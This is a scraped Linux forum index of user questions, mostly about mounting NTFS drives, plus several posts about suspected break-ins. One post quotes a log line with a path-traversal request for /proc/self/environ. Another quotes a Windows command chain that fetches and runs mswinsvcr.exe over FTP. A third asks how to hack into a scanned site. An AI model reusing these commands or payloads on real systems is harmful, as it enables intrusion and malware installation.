Ubuntu Security :: Mount.ntfs Ran On Its Own - Normal Or External Hack/break-in Attempt?
Aug 2, 2010
Running Ubuntu 10.04 I noticed my hard disc rumbling for longer than normal and louder. Not doing anything demanding to cause hard disk activity like this so I was suspicious so I checked my process list with 'top' command in the console terminal. At the top was mount.ntfs running. Eventually it stopped running after 20 seconds or so. At the time I have not been accessing NTFS filesystems, but I do have them. I have a dual boot Ubuntu 10.04 and Windows 7. In Ubuntu I've mounted the Windows main C drive and on the same hard disk a partitioned drive for sharing files between the OSs. I know mount.ntfs is a standard program but was it being run on my machine, instigated externally here? Was the running of mount.ntfs an attempt from outside to hack into Ubuntu and the mounted Windows areas of my machine via a backdoor connection or vulnerability? I've restarted my machine since then. Are there any logs I can check for malicious attempts to break in?
View 9 Replies
ADVERTISEMENT
Apr 13, 2011
I have received the following log messages on my Debian Squeeze webserver:Apr 13 15:16:37 vps suhosin[4699]: ALERT - ASCII-NUL chars not allowed within request variables - dropped variable 'controller' (attacker '75.126.235.115', file '/var/www/xxxxxxxxxxxxx.com
75.126.235.115 - - [13/Apr/2011:15:16:37 +0100] "GET /index.php?option=com_product&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8018 "-" "libwww-perl/6.01"
[code]....
View 1 Replies
View Related
Jul 30, 2009
Quote:
Originally Posted by G�del
It gets me within a mile
how i am auto mount the ntfs drives through the normal user with out asking password... I need it and also one thing is i want two drives only auto mount and when i open the other drives it should ask the password?...
View 1 Replies
View Related
Dec 4, 2010
i have installed Salix 13.1 LXDE version (Salix 13.1 is compatible with Slackware 13.1). I must use various external hard disks formatted with NTFS. The hard disks are automatically recognized and mounted with PCmanFM file manager, but only user root can write on them. How can I allow normal users to write on automounted external ntfs drives?
View 3 Replies
View Related
May 20, 2011
i want to mount NTFS by normal users so i used the following entry in fstab /dev/sda6 /media/Mostafa ntfs-3g noauto,exec,rw,user 0 0 however when i try to mount the partition i get the following error Unable to mount Mostafa
Error mounting: mount exited with exit code 1: helper failed with:
Error opening '/dev/sda6': Permission denied
Failed to mount '/dev/sda6': Permission denied
Please check '/dev/sda6' and the ntfs-3g binary permissions,
and the mounting user ID. More explanation is provided at
NTFS-3G Questions at Tuxera
[Code]...
View 6 Replies
View Related
Feb 19, 2010
I'm able to mount ntfs file system as root user but I want the same thing to be allowed to normal user .
I'm not much familier with linux environment so please explain me how to do that for normal user.
View 3 Replies
View Related
Jan 31, 2010
Have a 1TB external USB hard drive I want to use on both Windows and Linux (Mythbuntu 9.10), so I thought the easiest way would be to format it with NTFS. Installed the NTFS-3G package and I'm able to read and write to the drive fine from Linux, however I have a few questions;
1) How do I configure Linux so that when it mounts the NTFS partition it is writeable for user, group and other (bascially I want everyone to have read and write access)? Currently when the NTFS disk is mounted the permissions are restricted to the user only and I suspect I'll need to edit fstab for this, but don't have much experience here so need help with the specifics.
2) If my Linux PC is turned on with the external drive attached, the disk is not mounted until I double click on the icon on the desktop. Is there anyway I can configure Linux so that it will automatically mount the external disk when booting?
Below is what is in my fstab file at present;
Quote:
# /etc/fstab: static file system information.
#
# -- This file has been automaticly generated by ntfs-config --
#
# <file system> <mount point> <type> <options> <dump> <pass>
[Code]....
View 5 Replies
View Related
May 6, 2011
I have WD external 1TB USB 3.0 drive that I want to attach to a RHEL 5 computer. I don't want to format it to a FAT32 as I'm copyong over about 530GB of data. What is the easy to get the RHEL OS to recognize this drive? NTFS is not loaded on this system as I already checked.
View 3 Replies
View Related
Mar 14, 2010
I have an ntfs external hd; I can mount and use it fine, without entry in fstab, but not share stuff. That is to say: I can use nautilus / thunar to share folders on it without errors, but they are not accessible via the network. The issue may be that the mount point has permissions 700. I can solve that by Code:sudo mount -t ntfs-3g /dev/sdb1 /media/Databank -o umask=0,nls=utf8or by setting umask=022 in fstab, but then I can't mount it as user anymore; if I set fstab to
Code:
/dev/sdb1 /media/Databank ntfs-3g user,umask=022,nls=utf8,defaults 0 0
I get this when I try to mount it as user in the filebrowser:
[code]....
View 1 Replies
View Related
Apr 6, 2010
I have successfully mounted my Win7 volume and my external hard drives NTFS volume as well. However, after modifying the fstab I seem to only be getting the win7 volume to auto-mount. Below is the contents of my fstab. /dev/sdf3 is not mounting. Again, it works no problem if I manually mount it.
# /etc/fstab: static file system information.
#
# <file system> <mount point> <type> <options> <dump> <pass>
[code]....
View 6 Replies
View Related
Jan 22, 2011
I have 500GB external HDD. I have to mount it my CenOS -4.8 Machine.(kernel-2.6.9.89EL 32-bit) . External HDD partitions are ntfs file system partition. I have tried to mount ntfs partition in linux . But it's not done.
mount partition with ntfs parttion in linux.
View 3 Replies
View Related
Jun 21, 2011
I'm having problems mounting my NTFS external hard drive .
dmseg :
Code:
1.padlock: VIA PadLock Hash Engine not detected.
2.PPP MPPE Compression module registered
3.PPP BSD Compression module registered
4.PPP Deflate Compression module registered
5.npviewer.bin[5405]: segfault at ff99cd48 ip ff99cd48 sp bfc8afac error 4
6.usb 4-2: new high speed USB device using ehci_hcd and address 5
[code].....
View 2 Replies
View Related
Apr 10, 2011
my external HDD of 750GB bring me an error during mounting!it asks me to get to windows and reboot twice or cmd chkdsk/f of which when i do it only option comes is to format it, i do not wanna format it coz it's with a lot of ma useful data!am using debian just asking if its possible to retrieve ma data from it using commands persay and what are those
View 2 Replies
View Related
Dec 24, 2010
Kubuntu 10.10 nicely mounts vfat external media as UTF-8, see for example my disk-on-key:
Code:
/dev/sdd1 on /media/DOTANCOHEN type vfat (rw,nosuid,nodev,uhelper=udisks,uid=1002,gid=1002,shortname=mixed,dmask=0077,utf8=1,showexec)
However, NTFS external media is not UTF-8, and it is giving this user a hassle as her native language cannot be represented in ASCII: Code:
[Code]....
View 2 Replies
View Related
Dec 16, 2010
I am trying to mount an external USB hard drive. I'm using Debian Lenny 5. I tried to right-click on the hard drive and then select the mount command inside the gnome desktop environment but it gives me an error. Is there an easy way to mount and unmount this hard drive? The hard drive itself is formatted from the factory in NTFS. I'm going to leave it in this file format is a need to use it with Windows machines as well.
View 4 Replies
View Related
Jan 11, 2010
I am currently taking my CCNA course. I have come to realize that to be a great Admin and secure a companies data, you first have to know it's weakness. Now I have become aware of a few programs like John the ripper telnet password crack, nmap, and the like. Well I have used nmap to port scan my own website for practice. I received some good intel on what ports are open and vulnerable. I am now trying to figure out how to hack in.To get my website info I used :
[Code]...
View 12 Replies
View Related
Jul 20, 2010
I was running ubuntu 10.04 on a school laptop connected to the network. I was editing a file in emacs on an ssh connection to a school server when all of a sudden I see the remote desktop graphic (a thing that looks like a widescreen monitor) pop up in the top panel. A second later it announces that someone else has connected to my computer with 'ffff:someip'. I'm not sure of the specifics because I was too shocked. I do remember it started with some number of f's before a : The hacker then started typing
Code:
%systemroot%system32cmd.exe
del eq&e
I promptly yanked out the ethernet cable before anything else could be typed. I then went in and changed the Remote Desktop preferences to not allow anyone in. I'm guessing that I cut the hacker off from fully entering in a command similar to this:
Code:
%systemroot%system32cmd.exe
del eq&echo open 0.0.0.0 13643 >> eq&echo user 13302 30046 >> eq &echo get
mswinsvcr.exe >> eq &echo quit >> eq &ftp -n -s:eq &mswinsvcr.exe &del eq
which I found here: [URL]
How concerned should I be? It appears to be a windows hack. Did I prevent any damage from occurring? Is Remote Desktop really that easy to connect to another persons computer? I know this question is bait in a way. On my home machines I only allow vnc via ssh tunnels and that is through a router with proper port forwarding for the ssh ports and very few other ports forwarded. Such an attack has never happened to me at home. Is this possibly due to my setup or was I just lucky no one picked my computer to hack? So is the ssh tunnel & port forwarding a sufficiently safe setup or am I still at risk?
What degree of protection does the ssh tunnel and port forwarding provide? What else should I do to make my current home setup even more secure? The text I wrote above was the only text typed into the terminal. Because the attack was over Remote Desktop, what is the possibility that it was a bot? The text appeared slow enough for me to think that there was a person rather than a machine/program typing in the text. Does the Remote Desktop connection in a way provide a level of abstraction that prevents scripts as commands must be typed in through the Remote Desktop connection (vs. a ssh connection where a script might more easily be uploaded and executed)?
In the end I'm curious as to what else might have been accessed over the connection or if it was probably just restricted to the hacker attempting to run some windows commands? Since they connected via Remote Desktop and I saw the connection pop up and the typing begin in my terminal, did I see everything that the hacker attempted to perform? Am I correct in my research in finding that there is no log for Remote Desktop connections and therefore I can't find the ip they were connecting from? However, I would like to use this as a wake up call to myself to prevent unwanted access on my home computers.
View 9 Replies
View Related
Mar 4, 2010
Can mount.ntfs and mount.ntfs-3g reside simultaneously?
Whilst accessing an external NTFS drive mount.ntfs takes up a lot of CPU. I am not sure if its mounting the drive using mount.ntfs or mount.ntfs-3g? How do I find out and if they coexist how do I make the default mount drive ntfs-3g?
View 3 Replies
View Related
Sep 1, 2010
Is there a way in Lucid to require a sudo password to mount all external drives (e.g. thumb drives, USB CD/DVD drives, USB hard drives)
View 1 Replies
View Related
Nov 15, 2010
I've been running Linux for a year on our family computers (one desktop, one laptop and two netbooks). I've run into a problem with the encrypted ext4 partition (270GB) on a LaCie external hard drive which also has a NTFS partition (50GB) which is not encrypted . First two times I tried using the encrypted ext4 partition (from two different computers) it worked fine but now I can't access it at all. I can still access the NTFS partition.Encrypted external hard drive partition will unlock but won't mount (or unmount). The computer says "Opening 320GB Hard Disk" but after a minute says, "Unable to mount location. DBus error org.freedesktop.DBus.Error.NoReply"Disk utility (GUI for gparted I believe) states that the encrypted partition (/dev/sdb1) is unlocked and the underlying partition (/dev/dm-0) is not mounted but it has a "busy circle sign" on it that will not turn off. The NTFS partition on the same drive mounts and accesses normally.
But if I try to unmount the NTFS partition, it says: "Unable to stop drive. One or more partitions are busy on /dev/sdb"If I try to shut down the computer, it is unable to shut down because (I assume) it can't shut down that drive either. So I have to just turn off the computer.fdisk states that /dev/dm-0 doesn't have a valid partition table [full output attached]fsck suggests: "Filesystem mounted or opened exclusively by another program?"ps axuf shows some processes running on /dev/dm-0 but killinghem doesn't release the drive either. [full output attached]I checked /etc/blkid.tab (suggested in one vaguely related thread) and there's no actual file only a broken link pointing to /dev/.blkid.tab (which doesn't exist). I tried deleting this link and rebooting but that didn't change anything.when I finally gave up my data as lost, I tried to format the partition (using Disk Utility) and it refused saying, "One or more block devices are holding /dev/sdb"
View 1 Replies
View Related
Jul 18, 2010
Just installed 11.3 on my computer, however when I connect an external NTFS harddisk I receive an error message. When I open dolphin to connect to an internal NTFS partition I receive the message:
org.freedesktop.Hal.Device.PermissionDeniedByPolicy: org. freedesktop.hal.storage.mount-fixed auth_admin_keep_always <--
Anyone having an idea how I can fix this?
View 9 Replies
View Related
Nov 11, 2010
If root is disabled by default, how is it possible that someone managed to SSH into my computer using root? I never enable/set password for root, it's always left as the default as per a fresh install and I always use sudo for any admin tasks.Auth.logFirst there are a whole load of failed attempts then...
Code:
Nov 8 11:07:32 Morris-Desktop sshd[3601]: Failed password for root from 94.243.50.53 port 4360 ssh2
[code]...
View 9 Replies
View Related
Mar 6, 2010
I want to enable Advanced NTFS-3G support (permissions and users) automatically from the fstab entry.
View 1 Replies
View Related
Jul 16, 2010
I noticed a very very high cpu usage on my webserver. All four CPUs were running on 100%.
Top shows several perl processes from apache that run for a long time, with a high %CPU.
Since the server was fc10, I did a fresh installation to fc13, and the fresh installation didn't have this issue. Then I loaded back all the user-data, and it started again.
Several, 4, 6, 8, ... 100 perl processes from apache.
lsof -p with the pid of such a process
Code:
The estabilished connection is sometimes "proud2pirate.com" wich is a non-existing domain.
View 14 Replies
View Related
Apr 4, 2011
The libxml2 update specified by CVE-2010-4494 causes a notification that it will break Adobe AIR and TweetDeck on my machine.How can I blacklist this update so it won't keep showing up in the Updater applet?The applet says I should go into Yast and manually apply the update. When I do that and tell it not to apply the update, Yast exits and the Updater applet just tells me the update is still pending. I want to get rid of the update at least temporarily until Adobe fixes the dependency (assuming they ever do).
This is a major problem for me as I clearly don't intend to uninstall TweetDeck and AIR just for some security patch. Why didn't openSUSE test this patch for AIR compatibility?
View 6 Replies
View Related
Jun 29, 2011
While investigating my localhost access logs during an investigation to resolve locking myself out of my own server(!) I noticed this recent access attempt from a proxy referrer. I wouldn't expect this on a local server - currently set to listen on 127.0.01. The request was 403 forbidden, but surely the request should not have even reached this far? Is this an example of an unauthorised access attempt? I don't think it is me because all of my usual access requests are in moz 5 and im logged in to linux currently.
Note please do not click this link as I do not know where it leads ^^^^! (and i dont know how to disable it on this forum)
View 8 Replies
View Related
May 22, 2011
love security/pentest tools. This script adds ALL the tools from the Security Spin, plus Metasploit. Feel free to modify it if need be.
View 12 Replies
View Related
May 30, 2010
Is it possible to install security lab menu on a normal Fedora 13 installation? I don't want to use security spin.
View 14 Replies
View Related
Oct 22, 2010
On my server I some times login from my home where I have an internet connection which does not have a static IP each time I switch on my modem a dynamic IP isgenerated.I see in auth.log logs of following lines Quote:reverse mapping checking getaddrinfo forkkts-kk-dynamic-01.1.168.192.some_broadband.in [192.168.1.2] failed - POSSIBLE BREAK-IN ATTEMPT Accepted publickey for root from 192.168.1.2 port 22852 ssh2when ever I login to my server from home.In this case I do know that it was me who logged in but still why do I see such a log.What is this complaining about?
View 11 Replies
View Related
Nov 19, 2010
Just like the title says, if I were to try to run anything through gksu and accidentally put in an incorrect password, instead of the gksu window coming up again, it would just terminate.
Code:
theyain@theyain-laptop:~$ gksu update-manager
GNOME_SUDO_PASSGNOME_SUDO_PASSSorry, try again.
sudo: 3 incorrect password attempts
Whats interesting is that it gives me the sudo error after only one incorrect password attempt.
View 8 Replies
View Related
